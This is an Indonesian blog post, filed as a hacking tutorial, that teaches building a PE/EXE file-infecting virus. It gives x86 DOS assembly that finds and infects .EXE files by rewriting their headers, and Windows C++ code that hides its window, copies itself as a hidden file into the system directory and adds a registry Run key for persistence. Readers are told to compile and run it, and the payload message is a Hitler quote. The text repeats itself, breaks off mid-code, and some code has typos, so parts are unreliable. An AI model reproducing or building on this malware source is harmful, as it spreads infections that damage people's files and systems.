Teknik Injeksi Virus Dengan PE INFECTOR
DEFINISI PE INFEKTOR
hmnnn... sebenarnya PE Infektor adalah sebuah metode yang digunakan untuk menginfeksi suatu
file berekstensi .exe ... yaitu dengan cara menginjeksi file .exe tersebut dengan kode
virus. Jadi ketika file .exe yang terinfeksi dijalankan... maka script virus akan
jalan...wehehehehe...lebih asik kan ...daripada kita menggunakan file virus yang di-
kamuflasekan... sedangkan penularannya ya... sama ajah dari virus - virus yang dijalankan
... program virus tersebut akan menginjeksi file - file yang sehat dan diubah menjadi file
virus.
DIAGRAM PENULARAN
Nah dapat dijelaskan pada diagram penularan si virus ini akan mencari file sehat ..
kemudian akan mencari pada segmen ke berapa file .exe tersebut dapat disisipi kode virus.
PERSIAPAN PEMBUATAN
Untuk pembuatan PE infektor ini harus pertama anda harus tau tentang bahasa mesin, atau
kerennya adalah bahasa assembly. kedua anda harus tahu tentang visual c++ atau bahasa
pemrograman tingkat menengah... entah visual c++ atau borland c++ gak masalah, yang penting
c++ deh. Nah kemudian yang perlu disiapkan lagi ya palingan tau soal registry windows ...
Kita tidak perlu memakai Linker ASM soalnya dalam C++ langsung ada Linker and compiler-nya.
MEMBUAT KODE PE INFEKTOR DARI ASSEMBLY
Ini nihhhhhhh... awalnya kudu tau bahasa assembly dulu kemudian baru menanjak ke bahasa
menengahnya... ntar dijelasin kok... tenang ajah ... okeh!!!!
asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK" 'INI MEMANG BUAT PENANDA KODE ASM (WAJIB)
"HOST:" 'MENANDAI HOST ATO ALAMAT PERTAMA
"mov ax,4C00H" 'MEMINDAHKAN DATA YANG ADA DI MEMORI 4C00H KE VAR
AX
"int 21H" 'FUNGSI DOS FUNCTION SERVICES
"HOSTSEG ENDS"
"STACKSIZE EQU 100H" 'JIKA STACKSIZE = 100H
"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"
"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"
"DTA DB 2BH dup (?)"
"EXE_HDR DB 1CH dup (?)"
"EXEFILE DB '*.EXE',0" 'MENCARI EKSTENSI EXE
"HOSTS DW HOSTSEG,STACKSIZE"
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"
"VIRUS:" 'KODE VIRUS YANG AKAN DISISIPI BERAWAL DARI SINI
"push ax" 'ISI VARIABEL AX
"push cs" 'ISI VARIABEL CS
"pop ds" 'KELUARKAN ISI VARIABEL DS
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H" 'INTERRUPT DOS FUCNTION
"call FINDEXE" 'MEMANGGIL FUNGSI FINDEXE
"jc FINISH" 'KALO DAH SELESAI LOMPAT KE FUNGSI FINISH
"call INFECT" 'MEMANGGIL FUNGSI FINISH
"FINISH: push es" 'AWAL FUNGSI FINISH
"pop ds" 'MENGELUARKAN ISI DARI VARIABEL DS
"mov dx,80H" 'PINDAHKAN ISI DARI ALAMAT 80H KE DALAM DX
"mov ah,1AH" 'PINDAHKAN ISI DARI ALAMAT 1AH KE DALAM VAR AH
"int 21H" 'MEMANGGIL INTERRUPT DOS FUNCTION
"pop ax" 'MENGELUARKAN ISI YANG ADA DI VAR AX
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"
"sti"
"jmp DWORD PTR cs:[HOSTC]"
"FINDEXE:"
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"
"call FILE_OK"
"jnc FEX"
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"
Nah baris di bawah ini adalah potongan jika file tersebut adalah .exe maka akan ditulari
atau disisipkan kode virus:
"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"
"int 21H"
"jc OK_END1"
"mov bx,ax"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS"
"clc"
"jne OK_END1"
"OK_END: mov ah,3EH"
"int 21H"
"stc"
"OK_END1:ret"
"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+6]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+24]"
"cmp ax,4*NUMRELS"
"ret"
"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"
"int 21H"
"mov cx,OFFSET FINAL"
"xor dx,dx"
"mov ah,40H"
"int 21H"
"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"
"adc cx,0v"
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"
"mov cx,10"
"mov ah,40H"
"int 21H"
"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"
"int 21H"
"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"
"sub ax,WORD PTR [EXE_HDR+8]"
"mov WORD PTR [EXE_HDR+22],ax"
"mov WORD PTR [EXE_HDR+14],ax"
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE"
"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"vmov ax,WORD PTR [EXE_HDR+6]"
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"
"mov WORD PTR [EXE_HDR],OFFSET HOSTS"
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2"
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"mov ah,3EH"
"int 21H"
"ret"
"FINAL:"
"VSEG ENDS"
"END VIRUS"
);
SCRIPT VIRUS DENGAN BAHASA MENENGAH (C++)
Ehem .. ehem ... iya neh ... maap kalo nulisnya ada salah ... soalnya gua duduk di sebelaha
cewek ... cakep banget .. sihhhhhhhhhh tapi dah ada yang punya ... (PS: Maaf gua bukan
buaya' yah...jadi gak akan nyaplok sebelah gua..:-p)
Ok lanjut ... untuk script virus bahasa menengah ini ... ditulis dengan visual c++, nah
biar jelas coba kita liat scriptnyak satuk persatuk ... key...
untuk membedakan itu script pascal, visual basic dan c++ maka harus ada source code ini,
gunanya adalah untuk mendefinisikan, fungsi yang dipakai ada di file mana aja, contohnya :
#include
maka fungsi yang kita pakai ada di file stdio.h seperti cout, cin atau lainnya...
#include
#include
#include
#include
using namespace std;
nah disini adalah source3 code untuk memunculkan pesan di komputer, teserah lo lo pade mo
nulis apa ajah...tapi yang jelas yang bermanfaat yah... kayak gini:
char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are,
we shall drag a world with us... a world in flames' - adolf hitler";
ini potongan source code untuk melihat atau memanipulasi windows, maksudnya jendela yang
ada di sistem operasi windows:
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//start random name
srand(GetTickCount());
char buf[20] = "";
for(int i=rand()%20;i>=0;i--)
buf[i] = 'a' + rand()%26;
//end random name
nah yang satu ni untuk menyembunyikan aplikasi virus dari kejaran penangkap windows atau
fly by threats...tau gak... kalo gak tau... yaaa.. coba tekan ALT+TAB maka akan kelihatan
daftar aplikasi yang ada di windows... ato yang aktif di windows...
//start hide window
SetConsoleTitle("Windows");
HWND mainwin = FindWindow(NULL, "Windows");
ShowWindow(mainwin, 0);
HKEY hKey;
//end hide window
char sd[255];
char path[MAX_PATH];
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);
Nah yang ini untuk menyuntik registry yang ada di windows ... pokoknya untuk memanipulasi
registry lah... contohnya di sini alamat registry yang dimanipulasi adalah :
Software\\Microsoft\\Windows\\CurrentVersion\\Run
//start reg key
GetSystemDirectory(sd,255);
char fslash[260] = "//";//added
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKe
y );
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
RegCloseKey(hKey);
//end reg key
MERANGKAI KODE VIRUS
nah untuk merangkainya ... coba tulis script ini pada visual c++ kemudian dicompile dan jalankan ... okeh ...just take a look :
//need to learn mutex so virus doesnt run twice
#include
#include
#include
#include
using namespace std;
char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are, we shall drag a world with us... a world in flames' - adolf hitler";
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//start random name
srand(GetTickCount());
char buf[20] = "";
for(int i=rand()%20;i>=0;i--)
buf[i] = 'a' + rand()%26;
//end random name
//start hide window
SetConsoleTitle("Windows");
HWND mainwin = FindWindow(NULL, "Windows");
ShowWindow(mainwin, 0);
HKEY hKey;
//end hide window
char sd[255];
char path[MAX_PATH];
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);
//start reg key
GetSystemDirectory(sd,255);
char fslash[260] = "//";//added
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
RegCloseKey(hKey);
//end reg key
//start ASM code
asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK"
"HOST:"
"mov ax,4C00H"
"int 21H"
"HOSTSEG ENDS"
"STACKSIZE EQU 100H"
"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"
"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"
"DTA DB 2BH dup (?)"
"EXE_HDR DB 1CH dup (?)"
"EXEFILE DB '*.EXE',0"
"HOSTS DW HOSTSEG,STACKSIZE"
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"
"VIRUS:"
"push ax"
"push cs"
"pop ds"
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H"
"call FINDEXE"
"jc FINISH"
"call INFECT"
"FINISH: push es"
"pop ds"
"mov dx,80H"
"mov ah,1AH"
"int 21H"
"pop ax"
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"
"sti"
"jmp DWORD PTR cs:[HOSTC]"
"FINDEXE:"
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"
"call FILE_OK"
"jnc FEX"
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"
"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"
"int 21H"
"jc OK_END1"
"mov bx,ax"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS"
"clc"
"jne OK_END1"
"OK_END: mov ah,3EH"
"int 21H"
"stc"
"OK_END1:ret"
"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+6]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+24]"
"cmp ax,4*NUMRELS"
"ret"
"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"
"int 21H"
"mov cx,OFFSET FINAL"
"xor dx,dx"
"mov ah,40H"
"int 21H"
"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"
"adc cx,0v"
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"
"mov cx,10"
"mov ah,40H"
"int 21H"
"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"
"int 21H"
"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"
"sub ax,WORD PTR [EXE_HDR+8]"
"mov WORD PTR [EXE_HDR+22],ax"
"mov WORD PTR [EXE_HDR+14],ax"
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE"
"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"vmov ax,WORD PTR [EXE_HDR+6]"
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"
"mov WORD PTR [EXE_HDR],OFFSET HOSTS"
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2"
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"mov ah,3EH"
"int 21H"
"ret"
"FINAL:"
"VSEG ENDS"
"END VIRUS"
);
//end ASM code
return 0;
}
Posted on 00.00 by aZi and filed under
Hacking Tutorial
| 1 Comments »
hmnnn... sebenarnya PE Infektor adalah sebuah metode yang digunakan untuk menginfeksi suatu
file berekstensi .exe ... yaitu dengan cara menginjeksi file .exe tersebut dengan kode
virus. Jadi ketika file .exe yang terinfeksi dijalankan... maka script virus akan
jalan...wehehehehe...lebih asik kan ...daripada kita menggunakan file virus yang di-
kamuflasekan... sedangkan penularannya ya... sama ajah dari virus - virus yang dijalankan
... program virus tersebut akan menginjeksi file - file yang sehat dan diubah menjadi file
virus.
DIAGRAM PENULARAN
Nah dapat dijelaskan pada diagram penularan si virus ini akan mencari file sehat ..
kemudian akan mencari pada segmen ke berapa file .exe tersebut dapat disisipi kode virus.
PERSIAPAN PEMBUATAN
Untuk pembuatan PE infektor ini harus pertama anda harus tau tentang bahasa mesin, atau
kerennya adalah bahasa assembly. kedua anda harus tahu tentang visual c++ atau bahasa
pemrograman tingkat menengah... entah visual c++ atau borland c++ gak masalah, yang penting
c++ deh. Nah kemudian yang perlu disiapkan lagi ya palingan tau soal registry windows ...
Kita tidak perlu memakai Linker ASM soalnya dalam C++ langsung ada Linker and compiler-nya.
MEMBUAT KODE PE INFEKTOR DARI ASSEMBLY
Ini nihhhhhhh... awalnya kudu tau bahasa assembly dulu kemudian baru menanjak ke bahasa
menengahnya... ntar dijelasin kok... tenang ajah ... okeh!!!!
asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK" 'INI MEMANG BUAT PENANDA KODE ASM (WAJIB)
"HOST:" 'MENANDAI HOST ATO ALAMAT PERTAMA
"mov ax,4C00H" 'MEMINDAHKAN DATA YANG ADA DI MEMORI 4C00H KE VAR
AX
"int 21H" 'FUNGSI DOS FUNCTION SERVICES
"HOSTSEG ENDS"
"STACKSIZE EQU 100H" 'JIKA STACKSIZE = 100H
"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"
"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"
"DTA DB 2BH dup (?)"
"EXE_HDR DB 1CH dup (?)"
"EXEFILE DB '*.EXE',0" 'MENCARI EKSTENSI EXE
"HOSTS DW HOSTSEG,STACKSIZE"
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"
"VIRUS:" 'KODE VIRUS YANG AKAN DISISIPI BERAWAL DARI SINI
"push ax" 'ISI VARIABEL AX
"push cs" 'ISI VARIABEL CS
"pop ds" 'KELUARKAN ISI VARIABEL DS
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H" 'INTERRUPT DOS FUCNTION
"call FINDEXE" 'MEMANGGIL FUNGSI FINDEXE
"jc FINISH" 'KALO DAH SELESAI LOMPAT KE FUNGSI FINISH
"call INFECT" 'MEMANGGIL FUNGSI FINISH
"FINISH: push es" 'AWAL FUNGSI FINISH
"pop ds" 'MENGELUARKAN ISI DARI VARIABEL DS
"mov dx,80H" 'PINDAHKAN ISI DARI ALAMAT 80H KE DALAM DX
"mov ah,1AH" 'PINDAHKAN ISI DARI ALAMAT 1AH KE DALAM VAR AH
"int 21H" 'MEMANGGIL INTERRUPT DOS FUNCTION
"pop ax" 'MENGELUARKAN ISI YANG ADA DI VAR AX
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"
"sti"
"jmp DWORD PTR cs:[HOSTC]"
"FINDEXE:"
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"
"call FILE_OK"
"jnc FEX"
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"
Nah baris di bawah ini adalah potongan jika file tersebut adalah .exe maka akan ditulari
atau disisipkan kode virus:
"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"
"int 21H"
"jc OK_END1"
"mov bx,ax"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS"
"clc"
"jne OK_END1"
"OK_END: mov ah,3EH"
"int 21H"
"stc"
"OK_END1:ret"
"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+6]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+24]"
"cmp ax,4*NUMRELS"
"ret"
Sedangkan baris di bawah ini adalah baris untuk menginfeksi file .exe yang telah ditemukan oleh virus:
"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"
"int 21H"
"mov cx,OFFSET FINAL"
"xor dx,dx"
"mov ah,40H"
"int 21H"
"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"
"adc cx,0v"
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"
"mov cx,10"
"mov ah,40H"
"int 21H"
"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"
"int 21H"
"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"
"sub ax,WORD PTR [EXE_HDR+8]"
"mov WORD PTR [EXE_HDR+22],ax"
"mov WORD PTR [EXE_HDR+14],ax"
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE"
"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"vmov ax,WORD PTR [EXE_HDR+6]"
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"
"mov WORD PTR [EXE_HDR],OFFSET HOSTS"
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2"
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"mov ah,3EH"
"int 21H"
"ret"
Nah disini adalah baris yang paling saya suka ... ini adalah baris penutup atau akhir dari baris virus
"FINAL:"
"VSEG ENDS"
"END VIRUS"
);
SCRIPT VIRUS DENGAN BAHASA MENENGAH (C++)
Ehem .. ehem ... iya neh ... maap kalo nulisnya ada salah ... soalnya gua duduk di sebelaha
cewek ... cakep banget .. sihhhhhhhhhh tapi dah ada yang punya ... (PS: Maaf gua bukan
buaya' yah...jadi gak akan nyaplok sebelah gua..:-p)
Ok lanjut ... untuk script virus bahasa menengah ini ... ditulis dengan visual c++, nah
biar jelas coba kita liat scriptnyak satuk persatuk ... key...
untuk membedakan itu script pascal, visual basic dan c++ maka harus ada source code ini,
gunanya adalah untuk mendefinisikan, fungsi yang dipakai ada di file mana aja, contohnya :
#include
maka fungsi yang kita pakai ada di file stdio.h seperti cout, cin atau lainnya...
#include
#include
#include
#include
using namespace std;
nah disini adalah source3 code untuk memunculkan pesan di komputer, teserah lo lo pade mo
nulis apa ajah...tapi yang jelas yang bermanfaat yah... kayak gini:
char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are,
we shall drag a world with us... a world in flames' - adolf hitler";
ini potongan source code untuk melihat atau memanipulasi windows, maksudnya jendela yang
ada di sistem operasi windows:
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//start random name
srand(GetTickCount());
char buf[20] = "";
for(int i=rand()%20;i>=0;i--)
buf[i] = 'a' + rand()%26;
//end random name
nah yang satu ni untuk menyembunyikan aplikasi virus dari kejaran penangkap windows atau
fly by threats...tau gak... kalo gak tau... yaaa.. coba tekan ALT+TAB maka akan kelihatan
daftar aplikasi yang ada di windows... ato yang aktif di windows...
//start hide window
SetConsoleTitle("Windows");
HWND mainwin = FindWindow(NULL, "Windows");
ShowWindow(mainwin, 0);
HKEY hKey;
//end hide window
char sd[255];
char path[MAX_PATH];
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);
Nah yang ini untuk menyuntik registry yang ada di windows ... pokoknya untuk memanipulasi
registry lah... contohnya di sini alamat registry yang dimanipulasi adalah :
Software\\Microsoft\\Windows\\CurrentVersion\\Run
//start reg key
GetSystemDirectory(sd,255);
char fslash[260] = "//";//added
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKe
y );
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
RegCloseKey(hKey);
//end reg key
MERANGKAI KODE VIRUS
nah untuk merangkainya ... coba tulis script ini pada visual c++ kemudian dicompile dan jalankan ... okeh ...just take a look :
//need to learn mutex so virus doesnt run twice
#include
#include
#include
#include
using namespace std;
char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are, we shall drag a world with us... a world in flames' - adolf hitler";
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//start random name
srand(GetTickCount());
char buf[20] = "";
for(int i=rand()%20;i>=0;i--)
buf[i] = 'a' + rand()%26;
//end random name
//start hide window
SetConsoleTitle("Windows");
HWND mainwin = FindWindow(NULL, "Windows");
ShowWindow(mainwin, 0);
HKEY hKey;
//end hide window
char sd[255];
char path[MAX_PATH];
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);
//start reg key
GetSystemDirectory(sd,255);
char fslash[260] = "//";//added
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
RegCloseKey(hKey);
//end reg key
//start ASM code
asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK"
"HOST:"
"mov ax,4C00H"
"int 21H"
"HOSTSEG ENDS"
"STACKSIZE EQU 100H"
"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"
"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"
"DTA DB 2BH dup (?)"
"EXE_HDR DB 1CH dup (?)"
"EXEFILE DB '*.EXE',0"
"HOSTS DW HOSTSEG,STACKSIZE"
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"
"VIRUS:"
"push ax"
"push cs"
"pop ds"
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H"
"call FINDEXE"
"jc FINISH"
"call INFECT"
"FINISH: push es"
"pop ds"
"mov dx,80H"
"mov ah,1AH"
"int 21H"
"pop ax"
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"
"sti"
"jmp DWORD PTR cs:[HOSTC]"
"FINDEXE:"
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"
"call FILE_OK"
"jnc FEX"
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"
"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"
"int 21H"
"jc OK_END1"
"mov bx,ax"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS"
"clc"
"jne OK_END1"
"OK_END: mov ah,3EH"
"int 21H"
"stc"
"OK_END1:ret"
"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+6]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+24]"
"cmp ax,4*NUMRELS"
